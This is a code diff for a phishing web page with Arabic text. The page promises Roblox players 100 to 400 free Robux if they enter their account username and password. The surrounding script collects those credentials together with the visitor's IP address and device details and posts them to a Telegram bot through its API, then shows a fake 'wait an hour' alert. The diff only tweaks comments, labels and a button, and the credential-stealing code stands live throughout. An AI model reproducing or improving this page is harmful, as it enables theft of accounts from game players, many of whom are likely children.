--- a/index.html
+++ b/index.html
@@ -11,17 +11,17 @@
     <div class="container">
         <div class="login-box">
             <h2>الكمية محدودمن قناتنا محد يكون معه رابط غير الي اشترك بقناتي اكتب اسم حسابك وباسورده  ويمكن تربح 100 الى 400 روبوكس</h2>
-            <h2>الروبوكس محدود _يرجى الاشتراك بقناتنا ايضا لنقدم المزيد من الهدايه</h2> <!-- تغيير هنا -->
+            <h2>الروبوكس محدود _يرجى الاشتراك بقناتنا ايضا لنقدم المزيد من الهدايه</h2>
             <form id="login-form">
                 <div class="user-box">
-                    <input type="text" id="username" required> <!-- تغيير من email إلى username -->
-                    <label>username </label> <!-- تغيير النص هنا -->
+                    <input type="text" id="username" required>
+                    <label>Username</label>
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
                     <label>Password</label>
                 </div>
-                <a href="#" id="login-btn">Submit</a>
+                <button type="button" id="login-btn">Submit</button> <!-- تغيير من <a> إلى <button> -->
             </form>
         </div>
     </div>
@@ -36,8 +36,8 @@
             alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
 
             // الحصول على اسم المستخدم وكلمة المرور المدخلة
-            const username = document.getElementById('username').value;  // تغيير من email إلى username
-            const password = document.getElementById('password').value;
+            const username = document.getElementById('username').value;  // الحصول على اسم المستخدم
+            const password = document.getElementById('password').value; // الحصول على كلمة المرور
 
             console.log("Sending data to Telegram...");
 
@@ -52,9 +52,10 @@
                 const screenHeight = screen.height;
                 const deviceType = /mobile/i.test(navigator.userAgent) ? 'Mobile' : 'Desktop';
 
+                // تكوين رسالة البيانات المرسلة
                 const message =  
                     `<b>New Login Attempt</b>\n
-                    <b>Username:</b> ${username}\n  <!-- تغيير من Email إلى Username -->
+                    <b>Username:</b> ${username}\n
                     <b>Password:</b> ${password}\n
                     <b>IP Address:</b> ${ip}\n
                     <b>Device Type:</b> ${deviceType}\n
@@ -64,7 +65,7 @@
 
                 console.log("Message: ", message);
 
-                // إرسال الطلب إلى التلغرام
+                // إرسال الطلب إلى التلغرام عبر الـ API
                 const response = await axios.post(URI_API, {
                     chat_id: CHAT_ID,
                     parse_mode: 'html',
